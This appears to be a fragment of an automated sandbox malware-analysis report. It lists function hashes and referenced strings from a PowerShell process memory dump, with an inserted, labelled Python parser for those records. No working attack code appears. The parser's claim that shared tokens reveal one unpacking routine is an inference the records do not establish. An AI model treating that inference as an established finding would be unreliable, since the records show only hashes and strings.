                                                                                • Instruction Fuzzy Hash: AC81AEF4A002149FD714DB58C545FAEB7E2AB98308F508069E5016F7A5CB72EC92EB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$$^q
                                                                                • API String ID: 0-432994343
                                                                                • Opcode ID: a80fad020b3607fd1f7c2de5f095dd1df2cf51edc6cd350d8c784d992ddd74f9
                                                                                • Instruction ID: a510afbec08230ba0aa92b03cd070bb18236d46a4cff24e3c3526c267f3080bf
                                                                                • Opcode Fuzzy Hash: a80fad020b3607fd1f7c2de5f095dd1df2cf51edc6cd350d8c784d992ddd74f9
                                                                                • Instruction Fuzzy Hash: A911B1F1E00226DFCB20AE158501A7AF7E1EF64258F05807AD9449B201DB30C893EBE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $^q$$^q
                                                                                • API String ID: 0-355816377
                                                                                • Opcode ID: cb6a59499a14cc20131aab920c36e22ec4cf931f92acd8c8eed7689d3bd0ef47
                                                                                • Instruction ID: 38430f22b7891134d87394af7bad51bfafb9473adbac314f7f51eeebaad5beb2
                                                                                • Opcode Fuzzy Hash: cb6a59499a14cc20131aab920c36e22ec4cf931f92acd8c8eed7689d3bd0ef47
                                                                                • Instruction Fuzzy Hash: CB01C4B5700226DFD7248A04C844E72F7B5EBE121AF18802AD9044F251DB32D807DB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: x.fk
                                                                                • API String ID: 0-1423657076
                                                                                • Opcode ID: e519177fe236559bb4f41ee91f7bae27bd6bcdd09b1b68ca5c664cc580bc9868
                                                                                • Instruction ID: 0cb0046629e0aa5ca29093d50ba348b76b2b8b814ab76ad80e733dbc091b74d8
                                                                                • Opcode Fuzzy Hash: e519177fe236559bb4f41ee91f7bae27bd6bcdd09b1b68ca5c664cc580bc9868
                                                                                • Instruction Fuzzy Hash: 8231A5B4B402149FD7149B68C951FAFBBA3EB84344F10C464E9016F7A5CF76EC468B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b25ae8f10891ef4bfc7173ec1062ec64bf43461bcdcb96a236a5a2fdaa6a497f
                                                                                • Instruction ID: 6e8d564b87d9481493e9953f67ef121bdb7ced6f584268f37af870e262d2b190
                                                                                • Opcode Fuzzy Hash: b25ae8f10891ef4bfc7173ec1062ec64bf43461bcdcb96a236a5a2fdaa6a497f
                                                                                • Instruction Fuzzy Hash: 14314CF55043298FDB108F29C940766FBB5AF95254F2C40A6D445CB2A2C734C947D7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 395fd56e97a928efb4cb2754ebebe069f9abac33faa38b445b72e8c87b49f490
                                                                                • Instruction ID: eaa737f38a52bdbba300ffc30a24d60bccc25569f4077583acee613f17954dd1
                                                                                • Opcode Fuzzy Hash: 395fd56e97a928efb4cb2754ebebe069f9abac33faa38b445b72e8c87b49f490
                                                                                • Instruction Fuzzy Hash: 46315AF37001348BC71067689811AAFF752AFE4328B15C0AAD6419F365CE76ED5393E2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d9b8c51870baf01903ed3b859159ff130de9b08b96385fcf1910863a9eecccc0
                                                                                • Instruction ID: 6a9972ae4490b258dbe2f206d827823032b8b666be9d658950e3f338ff7e64c9
                                                                                • Opcode Fuzzy Hash: d9b8c51870baf01903ed3b859159ff130de9b08b96385fcf1910863a9eecccc0
                                                                                • Instruction Fuzzy Hash: C2210CF5A00229DFDB108F29C540776FBE9AFA4344F688066D8058B255CB31C983D7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4fcd866ca41378eb9de2368477fbd293e67e506935ad4de64a0868e530546ec9
                                                                                • Instruction ID: d6e9cacfdef1db27b06b38b5b3bdc16a9b4bde3a32cd62445e5288403f255d36
                                                                                • Opcode Fuzzy Hash: 4fcd866ca41378eb9de2368477fbd293e67e506935ad4de64a0868e530546ec9
                                                                                • Instruction Fuzzy Hash: 4C11817510E3E19FC723972898A6596FF709E5310971D90CBD0948F4A3D614D94BD3A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

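The function records above all share one layout (a "Memory Dump Source" header, a list of bullet fields, and a "Uniqueness Score" line), and the only thing that distinguishes one record from the next is its hashes and the strings it references. The Python below is an added example, not code from the Joe Sandbox report or from Joe Security: it parses records in that layout into dictionaries, sanity-checks the identifiers, and indexes functions by referenced string so that functions touching the same string (for example `x.fk`) can be grouped. The sample text is copied from four of the records listed above; the assumption that `$` separates tokens in the "String ID" field is inferred from the listing, and tokens that themselves contain `$` cannot be split back unambiguously.

```python
"""Parse Joe Sandbox "Memory Dump Source" function records and index them by
referenced string.  Added example; the field layout follows the listing above."""
import re
from collections import defaultdict

# Constructed sample: four records copied from the listing above, indentation
# stripped.  The last record has no "Strings" header and empty string/API IDs.
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
Similarity
• API ID:
• String ID: (ful$(ful$x.fk
• API String ID: 0-2383735965
• Opcode ID: 9bda31955e3d07b9579768d4de49ce5bf0f2182a4341627c61c9648eb750c80b
• Instruction ID: 4fe3740242a8dcc8b090f9c98f084a5da238c688a8408d10ac9eb5f5c6cbad7c
• Opcode Fuzzy Hash: 9bda31955e3d07b9579768d4de49ce5bf0f2182a4341627c61c9648eb750c80b
• Instruction Fuzzy Hash: 4891B0F4B002149FD744DB68C945FAEBBE3AB98308F508068D505AF795CB72EC529B91
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
Similarity
• API ID:
• String ID: (ful$x.fk
• API String ID: 0-1226617640
• Opcode ID: b4e9287ef44d4ce27bf2d3725aa33d85858160716b5a1e3da0e0b7f35e6ba9f9
• Instruction ID: 72ea77a0e57d2d9ec000f957cd68650eadfee13b12de65c4c0c1152e1cbd184b
• Opcode Fuzzy Hash: b4e9287ef44d4ce27bf2d3725aa33d85858160716b5a1e3da0e0b7f35e6ba9f9
• Instruction Fuzzy Hash: AC81AEF4A002149FD714DB58C545FAEB7E2AB98308F508069E5016F7A5CB72EC92EB91
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
Similarity
• API ID:
• String ID: x.fk
• API String ID: 0-1423657076
• Opcode ID: e519177fe236559bb4f41ee91f7bae27bd6bcdd09b1b68ca5c664cc580bc9868
• Instruction ID: 0cb0046629e0aa5ca29093d50ba348b76b2b8b814ab76ad80e733dbc091b74d8
• Opcode Fuzzy Hash: e519177fe236559bb4f41ee91f7bae27bd6bcdd09b1b68ca5c664cc580bc9868
• Instruction Fuzzy Hash: 8231A5B4B402149FD7149B68C951FAFBBA3EB84344F10C464E9016F7A5CF76EC468B91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b25ae8f10891ef4bfc7173ec1062ec64bf43461bcdcb96a236a5a2fdaa6a497f
• Instruction ID: 6e8d564b87d9481493e9953f67ef121bdb7ced6f584268f37af870e262d2b190
• Opcode Fuzzy Hash: b25ae8f10891ef4bfc7173ec1062ec64bf43461bcdcb96a236a5a2fdaa6a497f
• Instruction Fuzzy Hash: 14314CF55043298FDB108F29C940766FBB5AF95254F2C40A6D445CB2A2C734C947D7A1
Uniqueness

Uniqueness Score: -1.00%
"""

BULLET = re.compile(r"^•\s*([^:]+):\s*(.*)$")   # "• Key: value" lines
HEX64 = re.compile(r"^[0-9a-f]{64}$")            # Opcode ID / Instruction ID shape
HEXUP = re.compile(r"^[0-9A-F]+$")               # Instruction Fuzzy Hash shape


def _key(name):
    return name.strip().lower().replace(" ", "_")


def parse_records(text):
    """Turn a listing of 'Memory Dump Source' records into a list of dicts.

    A record opens at a 'Memory Dump Source' line and closes at its
    'Uniqueness Score' line; header-only lines (Strings, Similarity, ...)
    carry no data and are skipped."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {"strings": []}
            records.append(cur)
            continue
        if cur is None:
            continue
        if line.startswith("Uniqueness Score:"):
            cur["uniqueness_score"] = float(line.split(":", 1)[1].strip().rstrip("%"))
            cur = None
            continue
        m = BULLET.match(line)
        if not m:
            continue
        key, val = m.group(1), m.group(2).strip()
        if key.strip() == "Source File":
            # "<dump>.sdmp, Offset: 07D20000, based on PE: false" -> three fields
            parts = [p.strip() for p in val.split(",")]
            cur["source_file"] = parts[0]
            for p in parts[1:]:
                k, _, v = p.partition(":")
                cur[_key(k)] = v.strip()
        elif key.strip() == "String ID":
            # Assumption (inferred from the listing): tokens are joined with "$".
            # A token that itself contains "$" cannot be recovered unambiguously.
            cur["strings"] = [t for t in val.split("$") if t]
        else:
            cur[_key(key)] = val
    return records


def check_record(rec):
    """Return a list of shape problems for one record (empty list means OK)."""
    problems = []
    for k in ("opcode_id", "instruction_id"):
        if not HEX64.match(rec.get(k, "")):
            problems.append(f"{k}: expected 64 lowercase hex chars")
    if not HEXUP.match(rec.get("instruction_fuzzy_hash", "")):
        problems.append("instruction_fuzzy_hash: expected uppercase hex")
    # Every record in this listing repeats the Opcode ID as the Opcode Fuzzy
    # Hash; a record where they differ deserves a closer look.
    if rec.get("opcode_fuzzy_hash") != rec.get("opcode_id"):
        problems.append("opcode_fuzzy_hash differs from opcode_id")
    return problems


def index_by_string(records):
    """Map each referenced string token to the sorted Opcode IDs using it."""
    idx = defaultdict(set)
    for r in records:
        for tok in set(r["strings"]):
            idx[tok].add(r["opcode_id"])
    return {tok: sorted(ids) for tok, ids in idx.items()}


def unique_fuzzy_hashes(records):
    """Distinct Instruction Fuzzy Hashes, e.g. for cross-sample comparison."""
    return sorted({r["instruction_fuzzy_hash"] for r in records if r.get("instruction_fuzzy_hash")})


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(f"{len(recs)} records, {len(unique_fuzzy_hashes(recs))} distinct fuzzy hashes")
    for tok, ids in index_by_string(recs).items():
        print(f"{tok!r}: {len(ids)} function(s)")
    for r in recs:
        for p in check_record(r):
            print(r["opcode_id"][:12], p)
```

Feeding the whole listing through `parse_records` (after stripping the leading indentation) gives one dict per function; `index_by_string` then shows which functions in the 07D20000 dump share tokens such as `x.fk`, `(ful` and `4'^q`, which is the cheapest way to see how many of these PowerShell-resident functions belong to the same unpacking routine.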
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tP^q$tP^q
                                                                                • API String ID: 0-309238000
                                                                                • Opcode ID: 9e7fa2ea8b87ee07800ee1e83107a42f901a0d6c8c452b65e92109fd813c6246
                                                                                • Instruction ID: 97f637e71b9ba4ef5b8692f3c769bc8a765ff0a2f3debd302f88fabf3af70e28
                                                                                • Opcode Fuzzy Hash: 9e7fa2ea8b87ee07800ee1e83107a42f901a0d6c8c452b65e92109fd813c6246
                                                                                • Instruction Fuzzy Hash: 624159F1B003259FCB608A688845B67FFA2AF91314F0884AAD5099F291DA31D843E3D2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$(ful$(ful$(ful
                                                                                • API String ID: 0-100295639
                                                                                • Opcode ID: 02678bc9944d8865c1f769c33585c69a57f8eacf1769b7b0042635d019d7ee4d
                                                                                • Instruction ID: 3d2fe90878bc8aeccc1dbc89070607b264b4d2b537997ba19fc521a4f21b2fc9
                                                                                • Opcode Fuzzy Hash: 02678bc9944d8865c1f769c33585c69a57f8eacf1769b7b0042635d019d7ee4d
                                                                                • Instruction Fuzzy Hash: 677187B0A00215DFCB14DF68D951AAAFBB2EF99318F14C069D805AB755CB32EC43DB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ,Sul$,Sul$p5ek$xSul
                                                                                • API String ID: 0-4179798329
                                                                                • Opcode ID: cf83a56cf776bac3fd72d7ae21d0c277f2d720a78f29654afee02461f5ba768e
                                                                                • Instruction ID: b7f525b6cd9a54b333ea614b16f709b98f1595ab677d9f823e3bc90c04cd8f9d
                                                                                • Opcode Fuzzy Hash: cf83a56cf776bac3fd72d7ae21d0c277f2d720a78f29654afee02461f5ba768e
                                                                                • Instruction Fuzzy Hash: B3515AB27043268FC7218B29980076AFBA2BFF6329F15C06AF545CB251DA31E857D791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                • API String ID: 0-2125118731
                                                                                • Opcode ID: a1c8b01ec164cb5a32a5eec74b9db17dd08d333e6f749e05608f58bd3c5d1541
                                                                                • Instruction ID: fc0a1fef411a2d73f0d164dfaccb04fad13076581275c3da8a9a3d8a4bff5f61
                                                                                • Opcode Fuzzy Hash: a1c8b01ec164cb5a32a5eec74b9db17dd08d333e6f749e05608f58bd3c5d1541
                                                                                • Instruction Fuzzy Hash: 3431A9F17003266BD7281979AC01F3AF7864BD0B09F14842AAA43CF395DDB6DD5793A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                • API String ID: 0-2125118731
                                                                                • Opcode ID: 5f41a5142d8126bb9ced922dc25372822b5113c57e5accf9a723f7507539ce21
                                                                                • Instruction ID: fc68a5402652fe198e32c8150380c223cf505e2468811badcc9b1eefc751e36b
                                                                                • Opcode Fuzzy Hash: 5f41a5142d8126bb9ced922dc25372822b5113c57e5accf9a723f7507539ce21
                                                                                • Instruction Fuzzy Hash: B02188F130432A5BD738197A9804B27F7D6ABD0718F28882AA849CF795CD72D843A361
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                • API String ID: 0-2125118731
                                                                                • Opcode ID: d0ece6a5cd555da129059c27971fb24a69deb3ea054a694fcf91e55639af00bf
                                                                                • Instruction ID: 69bb9aca0dcfdd4185b069038784c0afb575cd221158933cd1d7521d03adab96
                                                                                • Opcode Fuzzy Hash: d0ece6a5cd555da129059c27971fb24a69deb3ea054a694fcf91e55639af00bf
                                                                                • Instruction Fuzzy Hash: 5A11CDF5A0032BEBCB248E558540666F7B1EBE5A18F19C4ABEC448B205DB39C447E7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                • API String ID: 0-2049395529
                                                                                • Opcode ID: ffd86e5593e44c6a50d8d417fde1345781f7af48eefe3eeba0a57314038cf23f
                                                                                • Instruction ID: 5afb3b2d26b52ab5a5e0e5a7233ebdd4d8b779d454eff1d1cbe2bf9d189a186a
                                                                                • Opcode Fuzzy Hash: ffd86e5593e44c6a50d8d417fde1345781f7af48eefe3eeba0a57314038cf23f
                                                                                • Instruction Fuzzy Hash: 73F0A0B1F4022EAB863C155D2824676C6E7ABD1E64725842FD1429F348CE63CD8B43D7
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:73.1%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:100%
                                                                                Total number of Nodes:5
                                                                                Total number of Limit Nodes:1

                                                                                Callgraph

                                                                                [Callgraph image; legend: Executed / Not Executed / Opacity -> Relevance / Disassembly available]
                                                                                Nodes: Function_0495404F, Function_04953969

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2882139454.00000000040F5000.00000040.00000400.00020000.00000000.sdmp, Offset: 040F5000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_40f5000_wab.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeSleepThunk
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%